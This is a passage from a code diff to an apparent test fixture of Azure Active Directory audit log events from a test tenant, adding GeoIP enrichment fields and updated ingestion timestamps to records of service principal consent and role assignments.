"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5757,6 +6129,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5923,7 +6307,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125014300Z", + "ingested": "2021-12-14T14:48:43.176656586Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -5950,6 +6334,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6116,7 +6512,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125018800Z", + "ingested": "2021-12-14T14:48:43.176657220Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9242333Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795815\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"14f7e7eb-0fd1-4f89-bda8-642d035f3541\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6143,6 +6539,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6312,7 +6720,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125024300Z", + "ingested": "2021-12-14T14:48:43.176657987Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:06.0142481Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795893\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"821dc03c-4e38-4cd1-82b2-3155b41b4418\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] =\\u003e [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -6339,6 +6747,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -6508,7 +6928,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125029500Z", + "ingested": "2021-12-14T14:48:43.176658775Z", "original": 